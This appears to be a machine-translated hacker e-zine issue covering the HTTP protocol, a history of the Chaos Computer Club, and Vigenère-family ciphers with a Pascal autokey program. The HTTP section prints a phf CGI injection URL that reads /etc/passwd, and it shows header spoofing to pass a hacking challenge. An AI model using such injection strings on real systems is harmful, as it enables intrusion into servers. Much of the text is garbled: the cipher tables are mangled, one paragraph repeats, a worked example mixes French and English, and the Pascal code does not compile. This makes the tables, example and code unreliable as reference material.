Version 1.0 also reviewed the semantics of the protocol. As you can imagine, version 1.0 had shortcomings, notably the notion of persistent connection (c stupid that) and virtual host. In addition, applications using HTTP/1.0 had capabilities that varied from one to another. Everything has been corrected in version 1.1 which first looks at the capabilities of software that communicate with each other.
HTTP defines its requests by headers. It is based on the concepts of URI (Uniform Resource Identifier), URL (for Location) and URN (... Name) that we will see in more detail later.
Terminology: the vocabulary to know
Connection: (I use the English term without x because the other terms will also be in English) It is a virtual (electronic) layer of data transport which is established between two programs in order to establish a communication.
Message: basic unit of http communication, it is a structured sequence of bytes transmitted by the connection. It is based on a syntax that we will study later.
Request: http request (request) message.
Response: http response message.
Resource: An "online data object" or service that can be identified by a URI. More simply, it is an object that can be accessed over a network.
Entity: I find this term impractical because it defines the content of a message (request or response). It is divided into two: the entity-header and the entity-body (in short, the head and the body of the message).
Client: a program that establishes a connection in order to send a request.
User-Agent: we will see that in practice, it is the client who starts the request. Most of the time it is your browser (browser), but it may be another software or even a search robot (Yahoo style!). By the way there is an article in the phrack 57 file 0x0a on these "intelligent agents".
Server: don't see a server as a pc or a website. Think of it more like a server in a Trojan horse: a server is an application that accepts the connection in order to respond to a request. Almost all programs are both client and server.
Origin server: the server on which the resource you want to obtain is located.
Proxy: an intermediate program, both client and server, it therefore acts as a relay between you and the resource you are requesting. There are "transparent" proxies which modify neither the request nor the response when they pass through them and "non-transparent" proxies which will add details... They are used by hackers because some offer a service of anonymity (anonymity filtering) which allows them to be (relatively) untraceable.
Gateway: a server which acts as an intermediary but which, unlike the proxy, pretends to be the "origin server". The client believes that the gateway owns the resource. If you know more about gateways, send me an email because I'm having trouble understanding how it works.
Tunnel: an intermediate program that functions as a "blind" relay between two connections. Once active, the tunnel is invisible in http communication. As soon as the connection is terminated the tunnel ceases to exist. But thanks to the anonymity file on the internet which was written by the guy from anonymat.org (go and take it as well as the one on telephony, it's super awesome), I know a little more. A tunnel is an "encrypted link" between you and your proxy. While you weren't completely anonymous with a proxy because your ISP (internet service provider) could determine where you were going, with a tunnel the ISP receives the data encrypted and therefore cannot read it.
Here I spent a lot of stuff but we have the main thing.
Protocol Parameters
The http version: the syntax is HTTP/version_num. The version number that will be used will be 1.1. Note that HTTP/2.04 is denoted HTTP/2.4 so version HTTP/2.13 would be newer than HTTP/2.4 (fictional examples).
Uniform Resource Identifiers: URIs are either relative or absolute paths. We'll see that later. In the meantime do not confuse them with URLs.
Uniform Resource Location (URL): The address of an Internet resource, the syntax is "http:" "//" host [ ":" port ] [ abs_path [ "?" query ]] . The port is generally not indicated because it is taken by default (80). The host is of the form www.serveur.com or even server.org.... The path is of the form /lotfree/index.html for example. In case it is a request (usually by a script) we can have something like /thing/thing.php?name=bidule
URI comparison: URIs are not case-sensitive (no upper/lower case distinction). A character can be encoded by %xx where xx corresponds to its ascii code in hexa on 2 characters. It is widely used by hackers because in some flaws it allows commands to be executed at the host.
A well-known flaw is: /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd hover your mouse over the link (without clicking) and look at the bottom of your browser how the codes are interpreted . The %0a corresponds to the Enter key and the %20 to a space.
Message types: We have seen that a message is either a request or a response. The syntax is:
generic-message = start-line
*(message-header CRLF)
CRLF
[ message-body ]
start-line = Request-Line | Status-LineCRLF stands for carriage return and LF for line feed. Headers are info, body is the object of the request/response. We will see examples later. The start line either a request or the status of the response.
Request: see the syntax of a request:
Request = Request-Line
*(( general-header
| request-header
| entity-header ) CRLF)
CRLF
[ message-body ]And the request-line is of the form: Method SP Request-URI SP HTTP-Version CRLF with SP representing a space. The syntax of the request is the most important that we will see.
Method: methods are the commands that can be used. There are OPTIONS, GET, HEAD, POST, PUT, DELETE, TRACE, CONNECT.
Request-URI: we saw this in the syntax of the request line. So it's a path. Here are some examples where there are URIs:
OPTIONS * HTTP/1.1 here the URI is limited to *
GET http://www.w3.org/pub/WWW/TheProject.html HTTP/1.1 Here the URI is a full path (a URL). And in 2 line: GET /pub/WWW/TheProject.html HTTP/1.1 here the URI is a relative path Host: www.w3.org This last syntax is the one we will use.
Request header fields: There are so many different header fields that we will limit ourselves to a small number. They provide very practical information such as the type of data accepted, the type of encoding, data for proxies, modification management (used by browsers to see if a page must be refreshed or if a version is loaded saved to your disk). Those that we will use are HOST, Referer and User-Agent but we can see a little more.
Response: the syntax is similar to that of the request except that it is a status-line and response-header... The response is very useful to the hacker because it returns information on the server (especially its type) .
The syntax of the status-line: Status-Line = HTTP-Version SP Status-Code SP Reason-Phrase CRLF
The http version is returned to us with the status-code. The most famous code is the 404 that we often see. The reason-phrase is the translation into words of the code.
Status Code and Reason Phrase: the status code consists of 3 digits. The most important is the first. They can be considered as traffic signs. The first number being the type of the sign (like obligation, prohibition, info...).
Some codes:
- 1xx: Informational - Request received, continuing process (the browser will try again)
- 2xx: Success - The action was successfully received, understood, and accepted (it works !!! the code you will not see in your browser ;- )
- 3xx: Redirection - Further action must be taken in order to complete the request (redirection)
- 4xx: Client Error - The request contains bad syntax or cannot be fulfilled (arg !! you mistyped the address or mistyped the request in telnet)
- 5xx: Server Error - The server failed to fulfill an apparently valid request (server side problem, nothing to do)
And a little more in detail those on which I have already come across: 101 - switching protocols (?), 301 - move permanently (seen only once and he did not want to display the page to me) 400 - Bad request (error when typing in telnet) 404 - Not found (bad address).
Personally, I don't see any differences between 401 - Unauthorized and 403 - Forbidden.
500 - Internal server error.
There are many others especially in the 4xx. For more details --> RFC2616 where each code is detailed.
Response header fiels: we will do very quickly. Most interesting in the answer is the Server field. Generally there are Date, Age (Cache-control, Expires), Transfer-Encoding and Content-Type.
Methods (what you all expect :-)
- OPTIONS: allows to know the methods which apply to a resource
- ex: OPTIONS /index.html HTTP/1.1
- HOST: www.perdu.com
- If you put * as resource you obtain general methods, banal information...
- GET: the method that we will use the most. This is the one you use to read web pages. It is therefore a request from the client to the server.
- HEAD: practical since it only returns the headers (information taken). Use as GET. Try HEAD/HTTP/1.1
- POST: request for acceptance of data by the client to the server. This is generally information that you send via a form. I don't know the syntax but it should look like the one used in web pages (we'll see that in num 4).
- PUT and DELETE: similar to their ftp functions, put and delete a resource. Functions that must be allowed to the admin. (website management)
Headers
Well, I skipped a lot of stuff because there's not much that will help us in the headers.
- From: I don't really know what it's for but I put it anyway. A method of identification apparently. Like From: thing@truc.com
- HOST: the syntax is "Host" ":" host [ ":" port ] in general we do not put the port. For example HOST: www.lost.com. So no need to put the full URI.
- Referer: arf!! The web address where we came from (by a link). Not badly used for statistics. So we can pretend that we come from anywhere. Attention it is necessary to put the complete URL with the http:// one also calls the referer the back-link.
- Location: same syntax as the referer. Used for redirects.
- User-Agent: fields that contain information about the client, for example: User-Agent: Mozilla/4.0 (compatible; MSIE 4.0; Windows NT) says that you are using Internet Explorer 4.0 with Windows NT. Mozilla was originally the code name for a version of Netscape but obviously Microsoft stole that name. Result: they almost all return Mozilla. Here is another example: User-Agent: Lynx/2.7 This one does not give its operating system. To find information to send as User-Agent do a search on google.
Here we are finished for the theory. Be aware that later in the RFC there are other things about securing HTTP/1.1, it talks about DNS spoofing, attacks, denial of service proxies...
Well that's all well and good, but what's the point of it? Well already the knowledge of a protocol is super practical especially since this one is probably the most used. Then it allows to exploit certain CGI, PHP flaws... Then if you use a sniffer it allows you to understand what are the GET /index.html HTTP/1.1 which are buried in the ASCII code that you sniff . We can also say that it's a step towards anonymity: it allows us to believe that we have such OS and such browser.
Otherwise you can always show off in front of your friends by giving them the definition of this or that status-code ("hey, did you know that the 402 is a Payment Required?";-).
One can well wonder what pushed me to go to see in an RFC. Well I had to during a level of a hacking challenge (www.try2hack.nl my favorite ;-)
Indeed to pass the level I had to have Linux with Internet Explorer and come from a link from Microsoft. First it pissed me off (no PC where I can put linux and IE and mine is not connected to the web) when at the link from microsoft with a little cross site scripting it should be possible but g not tried. But if it was enough to install software would have been too easy so there was a trick. Thanks to the forum I was able to find info then I read the RFC and now I am at Level 9. Honestly try try2hack it
Here are some examples of practice but since I gave you all the syntax it will not help you much more however this example shows a utility: the protection/selection of the server on the client.
When I accessed the script with a simple (basic) request:
GET /cgi-bin/xxxxxx HTTP/1.1 //I hid the script to prevent you from cheating at try2hack ;-)
HOST: www.try2hack.nl
HTTP /1.1 200 OK
Date: Sun, 24 Mar 2002 09:13:22 GMT
Server: Apache //wish an apache server
Cache-Control: max-age=604800
Expires: Sun, 31 Mar 2002 09:13:22 GMT
Transfer -Encoding: chunked
Content-Type: text/html
16c
<HTML><HEAD><TITLE>Try2Hack</TITLE></HEAD><BODY><PRE>
<B>Browser check:</B><BR>Sorry , but you must use Microsoft Internet Explorer 6. // this asshole wants IE 6.72
72<BR> <BR><B>OS check:</B><BR>Sorry, but you must use a UNIX/LINUX system // on a UNIX/LINUX
.<BR><BR> < BR><B>Link check:</B><BR>Sorry, but you must get here from a
link on the page: http://www.microsoft.com/ms.htm</PRE></BODY ></HTML> // plus I have to come from microsoft
0
By modifying my request a bit:
GET /cgi-bin/xxxxxxx HTTP/1.1
HOST: www.try2hack.nl
Referer: http://www.microsoft.com/ms.htm //hehe I come from microsoft
User-Agent: Mozilla/4.0 (compatible; MSIE 6.72; UNIX/LINUX) // we give them what they ask for ;-)
HTTP/1.1 200 OK
Date: Sun, 31 Mar 2002 21:58:08 GMT
Server: Apache
Cache- Control: max-age=604800
Expires: Sun, 07 Apr 2002 21:58:08 GMT
Transfer-Encoding: chunked
Content-Type: text/html
118
<HTML><HEAD><TITLE>Try2Hack</TITLE></HEAD ><BODY><PRE>
<B>Browser check:</B><BR>OK<BR> <BR><B>OS check:</B><BR>OK<BR> <BR><
B>Link check:</B><BR>OK<BR> <BR><A HREF="../xxxxx.html">Level 8</A><BR>P // I still have hidden some stuff
assword for the messageboard is: xxxxxxxxx</PRE></BODY></HTML> // frankly try this site makes you progress
0
That's it for this article (phew). Besides, now that I realize I used funny colors (green yellow red), I swear I didn't do it on purpose.
The CCC (Chaos Computer Club)
So there I am a fan. The CCC is a very old group of German hackers and it is still active, although now it is more there in terms of demands than in terms of hacking. Here is a file on the history of this great crew.
Well, let's start with Zataz's article (the most complete I've found).
Chaos Computer Club
Since the 1980s, there has been a group of hackers in Europe unlike any other. They are German, did the 400 shots but stayed on the straight and narrow. They are members of the same team, that of the CCC ., the Chaos Computer Club .
The galactic community
The idea of this group, Freedom of expression and IT without a master. Chaos _also claims freedom of information, arguing that it is imperative that people can form an opinion for themselves. In 1984, they will launch their manifesto: "We demand the recognition of a new human right, the right of free communication, without hindrance, throughout the whole world, between all men and all beings endowed with intelligence, without exception. Computers are instruments of play, work and thought. But it is above all the most important of the new media. We rise up against the policy of panic and cretinization that rages in matters of computers, as well as against the censorship measures of international industrial groups, postal monopolies and governments".
To get its message across, the CCC will use the media to ensure that the public can truly form their own opinion about the wonderful world of computing. Its founder, Herwart Holland-Moritz , explained his actions and those of his group as "An act of creation, practical and disrespectful". Herwart Holland-Moritz , aka Wau
Holland died on July 29, 2001 of cardiac arrest.
The first stroke of brilliance of the CCC will be carried out in 1984, from the memory of old veteran of the microphone, a blow which will remain engraved in all the memories. The CCC hackers will embezzle 135,000 marks via the Hamburg Savings Bank. "Informing the public" was the only stated goal at the time. In 1997, members of the Chaos Computer Club demonstrated, live on German television, the failure of software using Microsoft's ActiveX. This software was intended for bank branches. It was to allow money transactions from one account to another. The Chaos Computer Clubquickly established itself as the representative group of the ideology of hacking. "Destroy nothing but respond to the abuses of technological corporatism." The problem is that the CCC has often disclosed its actions after the press reports on them in its columns. Was the CCC playing a double game in the 80s?
White Hacker and Red Hacker
At the end of the 1980s, the CCC became a reference group with a hundred members and nearly 400 sympathizers.
In this group of teenagers, engineers, perfectly mastering computers and therefore the perfect target for foreign intelligence services, such as the KGB , who will not be mistaken.
Members of the CCC will hack large companies, such as Thomson , CERN or even the Polytechnic CRAY . Hacking this super computer was considered impossible at the time. The KGB appears in the case of the hacking of the VAX ofPhilips France in 1986 in Fontenay-sous-bois. At that time Philips was working with the military on a project close to the Exocet missiles . Information is stolen and resold to the USSR.
One of the pirates, a member of the CCC , will also be found by the German police, dead in a mysterious fire in Hanover.
The CCC will experience other incidents and another death, just as mysterious. This new death is called TRON , a brilliant designer in his specialization, cryptography. He will be found dead, in the park of Neukölln in Berlin. Hanged with his belt, the problem is that his feet touched the ground. theCCC will share its opinion on the subject: "Police sources suggest that it was a suicide. We do not share this opinion at all. Tron was one of the most brilliant leaders of hackers in Europe. He presented the possibilities of developing counterfeit cards for public telephones. He developed and concluded the first of these "miracle cards". Driven by the desire to research and explore all the technical possibilities, he came close to the limits of the laws and received a suspended sentence. After this experience, he felt the need to draw a line and contacted the Chaos Computer Club. He then used his creative energy and potential on projects that would no longer get him in trouble with the law. In his recent thesis, he wrote about the use of modern encryption systems in telecommunications. The setup he developed and presented: a low-cost jammer using encryption methods to secure telephone conversations over ISDN lines, became a standard due to its simplicity and compact size. TRON was also one of those who presented the means of cloning GSM smart cards in Germany. His great knowledge and creativity played a big role in the success of his project. TRONalways had a direct character and a very open personality and never had any problems. We see no reason for him to have committed suicide and we hope to have more information through the police investigation".
While the CCC became a legal organization in 1986, the Hamburg police, at the request of a French judge, searches, in 1987, the premises of the CCC , following the hacking of Philips . Balance sheet, justice will discover that members of the CCC have hacked the French CEA , the CNRS , the Paris Observatory , NASA . , … In 1989, theBFV ., equivalent of our French service, the DST . arrests a dozen members of the CCC who have had the unfortunate habit of hacking into American military sites and aerospace and nuclear research centers. They worked for the KGB , since 1985, in exchange for money and drugs. The DST . will discover that the Thomson hack was really just a bridge between the German hackers and the Russian intelligence services.
CCC France, a trap for pirates
At the end of the 1980s, France began to seriously worry about these intrusions. Via its counterintelligence service, the Direction de la Surveillance du Territoire , France will set up a club identical to the Hamburg CCC. It will be created in 1989 and will be judiciously named the CCC France.
At its head, Jean Bernard Condat , a young computer scientist, as spokesperson and JLD as its liaison officer. The purpose of this "club" is to bring together pirates under the same banner, trace their know-how and trace the hacks and their actors. It won't take long for the DST. to organize what is still called today "THE big raid" with no less than fifty young pirates arrested.
We had asked the question of the head of the DST about this infiltration, here is his answer: "From the moment we are interested in what is happening in these circles there, we carry out investigations both in France and on the international level insofar as the Internet abolishes borders. We had an ongoing investigation into cases of intrusions on our territory which led us to identify perpetrators who were located in Germany. The investigation concerning certain members including the Chaos Computer ClubGerman, showed that they wanted to sell information to the Soviet secret services ( KGB .) ". - The interview of this official of the DST <dst.htm> -
Here is an excerpt from an interview <http:// the.wiretapped.net/security/info/textfiles/chaos-digest/chaos-digest-73.txt> by Mr. Condat found on the web". At the CCCF we are only 72, we can't be more in our group... We take them on leaving Polytechnique, generally they are members of Mensa, healthy in body and mind, with enough to live on well beyond their means, and I am the carrot. Me, I am secretary general, I am here to speak and broadcast, but I am the most stupid of all. In computers, I know nothing. I am not not the linchpin, but the visible queen (or king) of the swarm (…) All the services in the world have tried to approach us, except the French services. They do not approach you. They trample you, and then they ask your permission." The CCCF <http://www.magic.be/InterieurNuit/SiteMars/Condat.html>. no longer exists since 1991 and Jean Bernard Condat is a registered trademark. We asked him a few questions about the CCC . - Interview with Mr. Condat <cccf.htm> -
The CCC today
At the beginning of the century, the Hamburg CCC has become an association like the others, known and recognized, with its small parties, its conferences and its outbursts. The most recent, the presentation of the Big Brother prize , during CeBIT 2001 , to the Siemens company . A satirical award for the software "SmartFilter" a filter that "Censors Internet and communication." The other big blow of the CCC . is the election of Andy Müller-Maghun , European representative to Icann , the body responsible for managing domain names, but also and above all, chaos . He will be elected on October 10, 2000 with 5,948 votes and therefore represents Europe within the Board of Directors of Icann . "I do not hide that I was surprised to be in the lead in this election. As spokesperson for the Chaos Computer ClubI seem to be well known as someone who represents the interests of the internet community. Freedom of speech, privacy and maintaining the Internet as a public space without it becoming the preserve of companies or governments. I think people expect me to bring our positions of freedom into discussions about the architecture of the web, so that future policies and rules aren't made by industry alone." We Will Explain - Interview with M. Müller-Maghun <ccc.htm> -
The Wau Holland website
<http://wauland.de/>
The CCC website
<http://www.ccc.de/ >
An article from transfer.net:
A hacker at ICANN
by Edgar Pansu
Internet users were called upon to vote to elect part of the board of directors of ICANN, the organization responsible for domain names.
The president of a hacker group is one of the chosen ones.
ICANN's "at large" consultation ended on the evening of Tuesday 10 October. The Internet Corporation for Assigned Names and Numbers, an organization that manages domain names on the Web (see box), proposed to Internet users to elect five members (out of 19) to its board of directors. Each continent had a chosen one. European voters, mostly Germans, have chosen to represent them Andy Müller-Magun, spokesperson for the Chaos Computer Club, a "historic" group of Teutonic hackers. Already well ahead in the first round, Müller-Magun won the European part of the ballot with 5,948 votes. Arriving in second position, the German Jeanette Hoffmann, also from the first round, collected 2,295 votes. Because it is all the paradox of these elections supposed to democratize the ICANN: certain candidates, designated by the board of directors of the organization, presented themselves directly in the second round. This is the case for three of the five new directors: the Ghanaian Nii Quaynor - elected for Africa -, the Japanese Masanobu Katoh, for Asia and the Brazilian Ivan Moura Campos, for Latin America. Aside from Andy Müller-Maghun, the only elected member from the first round is the American Karl Auerbach, an employee of Cisco Systems, who will represent North America. the Ghanaian Nii Quaynor - elected for Africa -, the Japanese Masanobu Katoh, for Asia and the Brazilian Ivan Moura Campos, for Latin America. Aside from Andy Müller-Maghun, the only elected member from the first round is the American Karl Auerbach, an employee of Cisco Systems, who will represent North America. the Ghanaian Nii Quaynor - elected for Africa -, the Japanese Masanobu Katoh, for Asia and the Brazilian Ivan Moura Campos, for Latin America. Aside from Andy Müller-Maghun, the only elected member from the first round is the American Karl Auerbach, an employee of Cisco Systems, who will represent North America.
Live score progress
In addition to the questionable designation of candidates by ICANN, the voting method surprised more than one: during the first round, Internet users registered for the election could observe in real time the progression of the scores of the various candidates, which could discourage them from voting for candidates with few votes.
Andy Müller-Magun, who presents himself as the voice of citizen Internet users, will he be able to imprint his ideas on the organization and change ICANN's practices? Nothing is less certain, since he will only be one of 19 directors. "He does not come from the seraglio so his arrival will not please everyone", confirms Loïc Damilaville, domain name specialist for whom the presence of the hacker "is a good sign". For little, he specifies "that he plays the game and does not represent only the interests of the Chaos Computer Club".
© 2000 Transfer.net
Another article made in transfert.net (they also exist in newspapers):
Wau Holland, one of the founders of the Chaos Computer Club, dies at 49.
He understood it before anyone else: computers are not reserved for companies and the army, they are means of communication and political emancipation for everyone. Wau Holland , whose real name is Herwart Holland-Moritz , died on Sunday July 29, following a heart attack, which occurred on May 27. His death comes 21 years after he co-founded the Chaos Computer Club in Germany , today the largest hacker collective in the world. At 49, he was a kind of godfather and soul of the German movement, whose spokesman Andy Müller-Maguhnis the elected representative of Europe at the very official ICANN . During the last annual congress of the CCC, held from December 27 to 29 in Berlin, he was always there, discussing everything with everyone. This big, tall man, a bearded original eternally in overalls, was watching the young generation of the CCC with tenderness., the one who works in start-ups and has not had to fight for access to computers and networks: "During all these years, we have learned how to mount hacker demonstrations. Now, we have learned to organize them in an elegant way", he replied to those who launched the controversy on the hypertrophy of the Club and its new festive penchant. Hacker in Europe Among his many feats of arms, there is the "Btx hack", perpetrated with Stefan Wernery , the other head of the first years of the CCC: in 1984, when Germany installs its minitel network, they hijack 130,000 DM from the Hamburg savings bank to the CCC account, which they return immediately after having published a press release on the security flaws of the system. He continued today to be a member of this Club of "Robin Hoods of the Net", without particular responsibility, always giving the image of the modern European hacker: a state of mind of curiosity and openness, crossing politics, social, culture and technology, light years away from the paranoid teenage revolt of American kiddie scripts. See that big closet? A poetic and caustic observer, he found beauty and irony in striking details. "Do you see this big cupboard? he asked, hilarious, pointing to a metal cube planted in a corner of the CCC headquarters. Berlin. It's a VAX, the most powerful computer systems in the world in the 80s. You could do years in jail for having entered it. We bought it at the flea market for a pittance. It's for decoration..." On its website, the virtual condolence book has already collected more than a thousand contributions from the whole community, which spread the sad news in alternative mailing lists. Wau Holland will take place in his hometown of Marsburg, thanks to an ongoing fundraiser on the Network. In ten days, Hackers©Large, the high mass of European hackers to be held in Holland, will pay tribute to him. don't do anything too sad, though," Holland would surely have remarked, bursting into his high-pitched laugh.
transfer.net 01.08.2001
Here, for the links that do not work, you will have to go through zataz.com. It should be noted that the history of the CCCF was published in zataz magazine n°2 (on sale in the press), and this with the interview of Condat.
File Cryptography: Part 1
As the name suggests, this article will focus on cryptography. I put part 1 because there may be a sequel in lotfree#4 (chances are ;-).
Some will skip to the next article just at the sight of the word cryptography, yet it is a very broad field and is used automatically today. It's very simple, we encrypt everything: your cookies, your transactions and even your fourth TV channel.
Cryptography is more in the field of mathematics than computing, yet without computing cryptography would be nothing: imagine decoding an entire page without using a program that does the work for you, it can take hours.
Cryptography can be useful if you are afraid that someone will intercept your data, or read your emails. (in case the admin of your school does not hold you in his heart ;-)
Today I will make you discover (or not) the method of Vigenere (the square of Vigenere) but we will also see its derivatives ( more advanced). But you will see it is very easy.
Vigenere is one of the cryptography methods using a key that only the recipient and the sender of the message must know. They don't all use this system which nevertheless seems natural (if you have read the following article you already know that the base64 has no key).
So we have a key and a message to encrypt. We act letter by letter (with the first letter of the key and the first letter of the sentence to be encrypted we obtain the first letter of the encrypted sentence and so on). The algorithm used is alphabet-based addition. Each letter has a value, i.e. A is 0, B is 1, C is 2... Z is 25.
So A+A=0+0=0=A. As A is worth 0 any letter encrypted with A will be worth itself. Another example: S+B = 18 + 1 = 19=T.
Last example: Y + K = 24+10=34. We left the aphabet (we stop at 25) so we come back to the beginning.
We do 34 divided by 26 that's it 1 time there remains 8 or the letter I. (we did a loop: 25 is Z, so 26 is A, roughly 26 is equal to 0).
We therefore use the remainder of the integer division (Euclidean division) also called modulo (here we do a modulo 26).
In a simpler way we can use the Vigenere square. Just take the intersection of two letters to get the encrypted letter. Here we can see that the intersection of Y and K gives I.
K (key) ABCDEFGHIJKLMNOPQRSTU VWXYZ (plaintext)
------- ------------------------------------------- --------P
AABCDEFGHIJKLMNOPQRST UVWXYZ
BBCDEFGHIJKLMNOPQRSTU VWXYZA
CCDEFGHIJKLMNOPQRSTUV WXYZAB
DDEFGHIJKLMNOPQRSTUVW XYZABC
EEFGHIJKLMNOPQRSTUVWX YZABCD
FFGHIJKLMNOPQRSTUVWXY ZABCDE
GGHIJKLMNOPQRSTUVWXYZ ABCDEF
HHIJKLMNOPQRSTUVWXYZA BCDEFG
IIJKLMNOPQRSTUVWXYZAB CDEFGH
JJKLMNOPQRSTUVWXYZABC DEFGHI
KKLMNOPQRSTUVWXYZABCD EFGHIJ
LLMNOPQRSTUVWXYZABCDE FGHIJK
MMNOPQRSTUVWXYZABCDEF GHIJKL ciphertext
NNOPQRSTUVWXYZABCDEFG HIJKLMC
OOPQRSTUVWXYZABCDEFGH IJKLMN
PPQRSTUVWXYZABCDEFGHI JKLMNO
QQRSTUVWXYZABCDEFGHIJ KLMNOP
RRSTUVWXYZABCDEFGHIJK LMNOPQ
SSTUVWXYZABCDEFGHIJKL MNOPQR
TTUVWXYZABCDEFGHIJKLM NOPQRS
UUVWXYZABCDEFGHIJKLMN OPQRST
VVWXYZABCDEFGHIJKLMNO PQRSTU
WWXYZABCDEFGHIJKLMNOP QRSTUV
XXYZABCDEFGHIJKLMNOPQ RSTUVW
YYZABCDEFGHIJKLMNOPQR STUVWX
ZZABCDEFGHIJKLMNOPQRS TUVWXYOften the key is a word, in any case it is often smaller than the sentence to be encrypted. So to encrypt the sentence Vigenere had the idea of repeating the key several times.
If the key is lotfree and the sentence to be encrypted is "cryptography is cool", we will have:
Key: LOTFREELOTFREELOTFREE LO
Sentence: LACRYPTOGRAPHYESTCO OL
Result: WOVWPTXZUKFGLMPQXXKGS ZZAnd to decipher it is not more difficult: we take the example of Y and K. We look in the line (or column) of the letter K and we look for the letter I in this line. We're going up... We're in the Y column, that's good. It doesn't matter whether you take the rows or the columns.
There is an easier way to encrypt/decrypt with this method, it is by using blocks:
Key: LOTFREE
Sentence: LACRYPT Result: WOVWPTX
OGRAPHIZUKFGLM
ECESTCOPQXXKGS
OLZZNow, the Variant method: only the square changes, the columns and rows must however be respected:
K (key) ABCDEFGHIJKLMNOPQRSTU VWXYZ (plaintext)
--------------------- ---------------------------------- ----------------- P
AABCDEFGHIJKLMNOPQRST UVWXYZ
ZBCDEFGHIJKLMNOPQRSTU VWXYZA
YCDEFGHIJKLMNOPQRSTUV WXYZAB
XDEFGHIJKLMNOPQRSTUVW XYZABC
WEFGHIJKLMNOPQRSTUVWX YZABCD
VFGHIJKLMNOPQRSTUVWXY ZABCDE
UGHIJKLMNOPQRSTUVWXYZ ABCDEF
THIJKLMNOPQRSTUVWXYZA BCDEFG
SIJKLMNOPQRSTUVWXYZAB CDEFGH
RJKLMNOPQRSTUVWXYZABC DEFGHI
QKLMNOPQRSTUVWXYZABCD EFGHIJ
PLMNOPQRSTUVWXYZABCDE FGHIJK
OMNOPQRSTUVWXYZABCDEF GHIJKL ciphertext NNOPQRSTUVWXYZABCDEFG
HIJKLMC MOPQRSTUVWXYZABCDEFGH
IJKLMN LPQRSTUVWXYZABCDEFGHI
JKLMNO
KQRSTUVWXYZABCDEFGHIJ KLMNOP
JRSTUVWXYZABCDEFGHIJK LMNOPQ
ISTUVWXYZABCDEFGHIJKL MNOPQR
HTUVWXYZABCDEFGHIJKLM NOPQRS
GUVWXYZABCDEFGHIJKLMN OPQRST
FVWXYZABCDEFGHIJKLMNOP QRSTU
EWXYZABCDEFGHIJKLMNOP QRSTUV
DXYZABCDEFGHIJKLMNOPQ RSTUVW
CYZABCDEFGHIJKLMNOPQR STUVWX
BZABCDEFGHIJKLMNOPQRS TUVWXYSo here if the key is K and we want to encrypt Y we get O. To decrypt we have K as key and O as result. We look for O on the line of K, we go up, we come across Y.
I also present the Beaufort method:
K (key) ABCDEFGHIJKLMNOPQRSTU VWXYZ (plaintext)
--------------------- ---------------------------------- ----------------- P
ZZYXWVUTSRQPONMLKJIHG FEDCBA
YYXWVUTSRQPONMLKJIHGF EDCBAZ
XXWVUTSRQPONMLKJIHGFE DCBAZY
WWVUTSRQPONMLKJIHGFED CBAZYX
VVUTSRQPONMLKJIHGFEDC BAZYXW
UUTSRQPONMLKJIHGFEDCB AZYXWV
TTSRQPONMLKJIHGFEDCBA ZYXWVU
SSRQPONMLKJIHGFEDCBAZ YXWVUT
RRQPONMLKJIHGFEDCBAZY XWVUTS
QQPONMLKJIHGFEDCBAZYX WVUTSR
PPONMLKJIHGFEDCBAZYXW VUTSRQ
OONMLKJIHGFEDCBAZYXWV UTSRQP
NNMLKJIHGFEDCBAZYXWVU TSRQP 0 ciphertext
MMLKJIHGFEDCBAZYXWVUT SRQP 0 NC
LLKJIHGFEDCBAZYXWVUTS RQP 0 NM
KKJIHGFEDCBAZYXWVUTSR QP 0 NML
JJIHGFEDCBAZYXWVUTSRQ P 0 NMLK
IIHGFEDCBAZYXWVUTSRQP 0 NMLKJ
HHGFEDCBAZYXWVUTSRQP 0 NMLKJI
GGFEDCBAZYXWVUTSRQP 0 NMLKJIH
FFEDCBAZYXWVUTSRQP 0 NMLKJIHG
EEDCBAZYXWVUTSRQP 0 NMLKJIHGF
DDCBAZYXWVUTSRQP 0 NMLKJIHGFE CCBAZYXWVUTSRQP 0 NMLKJIHGFED
BBAZYXWVUTSRQP 0 NMLKJIHGFEDC
AAZYXWVUTSRQP 0 NMLKJIHGFEDC
AAZYXWVUTSRQP 0 NMLKJIHGFEDThat's it, no comments.
There is also the way of cutting the sentence that comes into play, for example the slidefair method consists of cutting by pair of letters. Example:
Key=DIGRAPH
Phrase: the Slidefair can be used with Vigenere, Variant or Beaufort.
K = | DIGRAPH
-------------------------------
P = | th es li de fa ir ca C = | EW KM CR NU AF CX TJ
| nb eu se dw it hv ig | YQ MM YY FU TI GW ZP
| en er ev ar ia nt or | KH JM PK BS AI EC KV
| be au fort | CF MI IL CI
C: EW KM CR NU AF CX TJ YQ MM YY FU TI GW ZP
KH JM PK BS AI EC KV CF MI IL CIThe Interrupted key method uses a word split. In short, there are a lot of possibilities: every x letters, every x words, x syllables, or by alternating 1 letter / 2 letters...
The derivative method that I find the best is the Autokey , which I've saved for the end. It consists of using the sentence to be encrypted as the key. But there is always a real key. We have seen that with Vigenere we repeat the key until the encryption is finished. Here the key is the concatenation (the hooking) of itself with the sentence to be encrypted.
Here is an example:
Phrase : The autokey can be used with Vigenere, Variant or Beaufort.
Key: PRIMER
Key: PRIMERTHAUTOKEYCANBE USEDWITHVIGENEREVARIA NTORBE
Sentence: theautokeycanbeusedwi thvigenerevariantorbe aufort
Result: IYMMYKHRIYWTBLISUEQXM NZZLCMGLMMBEEMRROOIJE NNTFSXFor encryption there are no problems, on the other hand for decryption we discover the key at the same time as the sentence. The problem is that if you're wrong once, everything else is wrong. But this method is more interesting.
To spoil you, I have coded a small program in Pascal (because in C++ the management of c character strings is not super easy) which uses the autokey method. It encrypts and decrypts what you enter on the keyboard. If you know how to program you can improve it for file reading...
Here is the source:
program crypto;
var key,phrase,res : string;
choice, cpt: integer;
procedure touppercase(var word:string);
var i:integer;
begin
for i:=1 to length(word) do
if (word[i]>='a') and (word[i]<='z') then ord(word[i]):=ord(word[i])-32;
end;
function inint(var c:char):boolean;
begin
if (c>='A') and (c<='Z') then
inint:=true
else inint:=false;
end;
begin {beginning of main}
choice:=0;
res:='';
writeln('Choose the operating mode:');
while ((choice<1) or (choice>2)) do
begin
writeln('1->Encryption');
writeln('2->Decryption');
write('?');
readln(choice);
end;
writeln('Enter the key: ');
readln(key);
writeln('Enter the sentence: ');
readln(sentence);
touppercase(key);
touppercase(sentence);
if choice=1 then
begin
key:=key+phrase;
for cpt:=1 to length(phrase) do
begin
if ( inint(key[cpt]) and inint(phrase[cpt]) ) then
begin
res := res + chr( (((ord(key[cpt]) mod 65) + (ord(phrase[cpt]) mod 65)) mod 26) + 65)
end
else res:=res+phrase[cpt];
end;
writeln('--Result of encryption--');
writeln(res);
end
else
